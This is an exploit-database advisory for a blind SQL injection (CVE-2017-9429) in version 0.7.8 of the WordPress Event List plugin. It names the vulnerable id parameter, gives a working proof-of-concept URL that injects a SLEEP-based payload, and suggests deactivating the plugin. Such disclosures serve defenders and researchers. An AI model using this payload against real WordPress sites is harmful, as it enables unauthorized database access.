Home / exploitsPDF  

WordPress Event List 0.7.8 SQL Injection

Posted on 15 June 2017

# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection # Date: 04-06-2017 # Exploit Author: Dimitrios Tsagkarakis # Website: dtsa.eu # Software Link: https://wordpress.org/plugins/event-list/ # Version: 0.7.8 # CVE : CVE-2017-9429 # Category: webapps 1. Description: SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress allows an authenticated user to execute arbitrary SQL commands via the id parameter to wp-admin/admin.php. 2. Proof of Concept: http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id =1 AND SLEEP(10) 3. Solution: The plugin has been removed from WordPress. Deactivate the plug-in and wait for a hotfix. 4. Reference: http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje ction-sqli/ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

 

TOP